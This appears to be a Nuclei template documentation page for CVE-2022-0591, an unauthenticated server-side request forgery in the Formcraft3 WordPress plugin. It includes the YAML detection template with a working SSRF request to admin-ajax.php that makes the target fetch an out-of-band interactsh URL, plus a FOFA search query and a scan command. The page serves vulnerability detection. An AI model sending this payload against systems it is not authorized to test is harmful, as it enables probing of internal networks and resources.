Skip to content
Nuclei Templates

Formcraft3 <3.8.28 - Server-Side Request Forgery

ID: CVE-2022-0591

Severity: critical

Author: Akincibor,j4vaovo

Tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc

Description

Section titled “Description”

Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0591


info:
  name: Formcraft3 <3.8.28 - Server-Side Request Forgery
  author: Akincibor,j4vaovo
  severity: critical
  description: |
    Formcraft3 before version 3.8.2  does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
  impact: |
    An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning.
  remediation: |
    Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability.
  reference:
    - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2022-0591
    cwe-id: CWE-918
    epss-score: 0.03628
    epss-percentile: 0.90752
    cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: subtlewebinc
    product: formcraft3
    framework: wordpress
    fofa-query: "body=\"formcraft3\" && body=\"wp-\""
  tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc
flow: http(1) && http(2)


http:
  - method: GET
    path:
      - '{{BaseURL}}'


    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/plugins/formcraft3/'


  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: WordPress"
# digest: 4a0a004730450221008f70263c2d2ba05e304a0948073371fb94190c01f230193405a472b9f34b3f27022031868a073032fe868923a0fa96c6ab0f7369c90921a35bfadb490aa659361fc7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0591.yaml"

View on Github